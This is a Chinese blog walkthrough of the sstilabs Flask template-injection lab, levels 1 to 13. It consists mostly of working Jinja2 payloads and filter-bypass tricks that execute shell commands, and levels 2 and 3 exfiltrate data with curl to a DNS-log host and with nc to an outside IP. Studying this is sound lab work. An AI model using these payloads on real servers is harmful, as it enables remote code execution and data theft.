flask sssti lab闯关记录

flask ssti lab闯关记录

sstilab是一个模板注入的靶场,目前只有Flask模板注入的练习

地址:https://github.com/X3NNY/sstilabs

image-20220413022608965

level 1

判断出是post方法

image-20220413121154292

借用bp的intrude模块查看可以利用的类,这里查找的模块是__import__

image-20220413122654917

发现80、81、82、83可以有__import__模块,加以利用得到payload

{{[].__class__.__base__.__subclasses__()[80].__init__.__globals__['__import__']('os').popen("cat flag").read()}}

打过去获得flag

image-20220413124818248

还可以尝试其他模块,比如__builtins__popenossys

# __builtins__
{{().__class__.__base__.__subclasses__()[80].__init__.__globals__.__builtins__['__import__']('os').popen('cat flag').read()}}
# popen
{{().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat flag').read()}}
# os
{{().__class__.__base__.__subclasses__()[213].__init__.__globals__['os'].popen('cat flag').read()}}

level 2

过滤了{ } ,用{%%}替代。这里有两种方法绕过

  • print标记

    {%print [].__class__.__base__.__subclasses__()[80].__init__.__globals__['__import__']('os').popen("cat flag").read()%}
    

    image-20220413124858389

  • dnslog外带

    {% if ().__class__.__base__.__subclasses__()[80].__init__.__globals__['__import__']('os').popen("curl `cat flag`.0ppgif.ceye.io").read()=='ssti' %}1{% endif %}
    

    image-20220413124731416

level 3

这道是盲注,有两种方法绕过

  • dnslog外带

    {% for i in ''.__class__.__mro__[-1].__subclasses__() %}{% if i.__name__=='Popen' %}{{ i.__init__.__globals__['os'].popen('curl http://`cat flag`.0ppgif.ceye.io').read()}}{% endif %}{% endfor %}
    

    image-20220413132201345

  • 通过nc命令将文件内容回显到自己的服务器上

    {% for i in ''.__class__.__mro__[-1].__subclasses__() %}{% if i.__name__=='Popen' %}{{ i.__init__.__globals__['os'].popen('cat flag|nc 119.91.214.224 1234').read()}}{% endif %}{% endfor %}
    

    image-20220413132542877

level 4

过滤了[ ],这里有两种情况下的过滤

  • 使用pop__getitem__()代替索引中的[]
  • 使用__getattribute__代替魔术方法中的[]
# os
{{().__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(213).__init__.__globals__.__getitem__('os').popen('cat flag').read()}}

# popen
{{().__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(132).__init__.__globals__.__getitem__('popen')('cat flag').read()}}

# 一句话
{% for i in ''.__class__.__mro__.__getitem__(-1).__subclasses__() %}{% if i.__name__=='Popen' %}{{ i.__init__.__globals__.__getitem__('os').popen('cat flag').read()}}{% endif %}{% endfor %}

level 5

过滤了单、双引号,有两种方法绕过

  • request绕过

    #post
    # __builtins__
    {{().__class__.__base__.subclasses__()[80].__init__.__globals__.__builtins__[request.values.arg1](request.values.arg2).popen(request.values.arg3).read()}}
    POST:arg1=__import__,arg2=os,arg3=popen
    
    # popen
    {{().__class__.__base__.subclasses__()[132].__init__.__globals__[request.values.arg1](request.values.arg2).read()}}
    POST:arg1=popen,arg2=cat flag
    
    # os
    {{().__class__.__base__.subclasses__()[213].__init__.__globals__[request.values.arg1].popen(request.values.arg2).read()}}
    POST:arg1=popen,arg2=cat flag
    
    
    #cookie
    # popen
    {{().__class__.__base__.subclasses__()[132].__init__.__globals__[request.cookies.arg1](request.cookies.arg2).read()}}
    Cookie:arg1=popen,arg2=cat flag
    
  • chr绕过

    先找出chr()函数的位置

    {{().__class__.__mro__[-1].__subclasses__()[0].__init__.__globals__.__builtins__.chr}}
    

    image-20220413151509332

{%set chr=[].__class__.__mro__[-1].__subclasses__()[58].__init__.__globals__.__builtins__.chr%}
{%print(().__class__.__mro__[-1].__subclasses__()[258].__init__.__globals__[chr(111)%2bchr(115)].popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read())%}

不过这个没成功,不知道什么原因。

level 6

绕过下划线_,使用十六进制编码绕过,_编码后为\x5f

先进行替换

string1 = "{{().__class__.__base__.__subclasses__()[213].__init__.__globals__['os'].popen('cat flag').read()}}"
def tohex(string):
    result = ""
    
    for i in range(len(string)):
        if string[i] == '_':
            result += "\\x"+hex(ord(string[i]))[2:]
            continue
        result += string[i]
    print(result)

tohex(string1)

再添加[""],得到

{{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbase\x5f\x5f"]["\x5f\x5fsubclasses\x5f\x5f"]()[213]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]['os'].popen('cat flag').read()}}
  • Unicode编码
{{lipsum|attr("\u005f\u005fglobals\u005f\u005f")|attr("\u005f\u005fgetitem\u005f\u005f")("os")|attr("popen")("cat flag")|attr("read")()}}

这里使用了lipsum这个方法直接调用os

  • base64编码
{{()|attr('X19jbGFzc19f'.decode('base64'))|attr('X19iYXNlX18='.decode('base64'))|attr('X19zdWJjbGFzc2VzX18='.decode('base64'))()|attr('X19nZXRpdGVtX18='.decode('base64'))(213)|attr('X19pbml0X18='.decode('base64'))|attr('X19nbG9iYWxzX18='.decode('base64'))|attr('X19nZXRpdGVtX18='.decode('base64'))('os')|attr('popen')('cat flag')|attr('read')()}}
  • attr()配合request
{{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}} 
x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat f*').read()

image-20220413155846489

level 7

过滤了.

  • []绕过

    {{()['__class__']['__base__']['__subclasses__']()[213]['__init__']['__globals__']['os']['popen']('cat flag')['read']()}}
    
  • attr()绕过

    {{()|attr('__class__')|attr('__base__')|attr('__subclasses__')()|attr('__getitem__')(213)|attr('__init__')|attr('__globals__')|attr('__getitem__')('os')|attr('popen')('cat flag')|attr('read')()}}
    

level 8

WAF: bl[“class”, “arg”, “form”, “value”, “data”, “request”, “init”, “global”, “open”, “mro”, “base”, “attr”]

过滤了一堆关键字

  • +拼接绕过

    # popen
    {{()['__cl'+'ass__']['__ba'+'se__']['__subc'+'lasses__']()['__getitem__'](132)['__in'+'it__']['__gl'+
    'obals__']['__getitem__']('po'+'pen')('cat flag').read()}}
    
    # os
    {{()['__cl'+'ass__']['__ba'+'se__']['__subcl'+'asses__']()['__getitem__'](213)['__in'+'it__']['__gl'+'obals__']['__getitem__']('os')['po'+'pen']('cat flag')['read']()}}
    

level 9

过滤了数字

  • 用循环找到能利用的类直接用
{% for i in ''.__class__.__base__.__subclasses__() %}{% if i.__name__=='Popen' %}{{ i.__init__.__globals__.__getitem__('os').popen('cat flag').read()}}{% endif %}{% endfor %}
  • 用lipsum不通过数字直接利用
{{lipsum|attr("__globals__")|attr("__getitem__")("os")|attr("popen")("cat flag")|attr("read")()}}
  • 构造数字进行拼接

首先构造数字

{%set zero=([]|string|list).index('[')%}
{%set one=dict(a=a)|join|count%}
{%set two=dict(aa=a)|join|count%}
{%set three=dict(aaa=a)|join|count%}
{%set four=dict(aaaa=a)|join|count%}
{%set five=dict(aaaaa=a)|join|count%}
{%set six=dict(aaaaaa=a)|join|count%}
{%set seven=dict(aaaaaaa=a)|join|count%}
{%set eight=dict(aaaaaaaa=a)|join|count%}
{%set nine=dict(aaaaaaaaa=a)|join|count%}

然后拼接数字,这里以213为例

{% set erwuba=(two~one~three)|int %}

最终payload

{%set one=dict(a=a)|join|count%}
{%set two=dict(aa=a)|join|count%}
{%set three=dict(aaa=a)|join|count%}
{% set eryisan=(two~one~three)|int %}
{{().__class__.__base__.__subclasses__()[eryisan].__init__.__globals__['os'].popen('cat flag').read()}}

level 10

WAF: set config = None

这一关的目标不是flag,而是获取config,可以通过current_app来获取

  • url_for
{{url_for.__globals__['current_app'].config}}
  • get_flashed_messages
{{get_flashed_messages.__globals__['current_app'].config}}

level 11

**WAF: bl[’’’, ‘"’, ‘+’, ‘request’, ‘.’, ‘[’, ‘]’] **

11关过滤了一堆东西,先确定一个利用的基本payload

{{lipsum|attr("__globals__")|attr("__getitem__")("os")|attr("popen")("cat flag")|attr("read")()}}

然后再构造变量来绕过,思路为:利用set来定义变量,使用attr()来提取使用变量绕过点,中括号。但是这样存在一个问题是需要获取下划线,这里通过lipsum来获取下划线。

首先查看_在第几个

{{(lipsum|string|list)}}

得到,这里是下标18为下划线

Hello ['<', 'f', 'u', 'n', 'c', 't', 'i', 'o', 'n', ' ', 'g', 'e', 'n', 'e', 'r', 'a', 't', 'e', '_', 'l', 'o', 'r', 'e', 'm', '_', 'i', 'p', 's', 'u', 'm', ' ', 'a', 't', ' ', '0', 'x', '7', 'f', '7', '4', '1', '9', '6', '1', 'c', '6', '7', '0', '>']
{{(lipsum|string|list)|attr(pop)(18)}}

这里问题来了,attr()里面要求的是字符串,直接输pop需要用引号''包围起来,但是这里又过滤了引号,所以要先构造一个pop字符串:

{% set pop=dict(pop=a)|join %}
{% xiahuaxian=(lipsum|string|list)|attr(pop)(18)%}

此时就能成功取到_,在用下划线去构造其他的类:

{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join%}

再去构造其他用到的方法:

{% set space=(lipsum|string|list)|attr(pop)(9)%}
{% os=dict(os=a)|join%}
{% set popen=dict(popen=a)|join%}
{% set cat=dict(cat=a)|join%}
{% set cmd=(cat,space,dict(flag=a)|join)|join%}
{% set read=dict(read=a)|join%}

最后就是完整的利用语法:

{{lipsum|attr(globals)|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}

整合在一起就是

{% set pop=dict(pop=a)|join %}
{% set xiahuaxian=(lipsum|string|list)|attr(pop)(18)%}
{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set space=(lipsum|string|list)|attr(pop)(9)%}
{% set os=dict(os=a)|join%}
{% set popen=dict(popen=a)|join%}
{% set cat=dict(cat=a)|join%}
{% set cmd=(cat,space,dict(flag=a)|join)|join%}
{% set read=dict(read=a)|join%}

{{lipsum|attr(globals)|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}

level 12

WAF:bl[’_’, ‘.’, ‘0-9’, ‘\’, ‘’’, ‘"’, ‘[’, ‘]’]

这关还对数字进行了过滤,也就是在上一关的payload基础上,设置一下数字的获取

{%set nine=dict(aaaaaaaaa=a)|join|count%}
{%set eighteen=nine+nine%}
{% set pop=dict(pop=a)|join %}
{% set xiahuaxian=(lipsum|string|list)|attr(pop)(e)%}
{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set space=(lipsum|string|list)|attr(pop)(nine)%}
{% set os=dict(os=a)|join%}
{% set popen=dict(popen=a)|join%}
{% set cat=dict(cat=a)|join%}
{% set cmd=(cat,space,dict(flag=a)|join)|join%}
{% set read=dict(read=a)|join%}

{{lipsum|attr(globals)|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}

level 13

WAF:bl[’_’, ‘.’, ‘\’, ‘’’, ‘"’, ‘request’, ‘+’, ‘class’, ‘init’, ‘arg’, ‘config’, ‘app’, ‘self’, ‘[’, ‘]’]

增加了一些关键字以及+的过滤,直接用11的payload即可,或者改一下12关的payload

{%set one=dict(a=a)|join|count%} 
{%set eight=dict(aaaaaaaa=a)|join|count%}
{%set nine=dict(aaaaaaaaa=a)|join|count%}
{%set eighteen=(one~eight)|int%} 
{% set pop=dict(pop=a)|join %} 
{% set xiahuaxian=(lipsum|string|list)|attr(pop)(eighteen)%} 
{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set space=(lipsum|string|list)|attr(pop)(nine)%} {% set os=dict(os=a)|join%} 
{% set popen=dict(popen=a)|join%} {% set cat=dict(cat=a)|join%} 
{% set cmd=(cat,space,dict(flag=a)|join)|join%} {% set read=dict(read=a)|join%}  

{{lipsum|attr(globals)|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}

参考资料

GitHub SSTI靶场 wp

MAR & DASCTF 2021 baby_flask

GitHub SSTI靶场 wp

MAR & DASCTF 2021 baby_flask

CTFshow-WEB入门-SSTI

  • 5
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值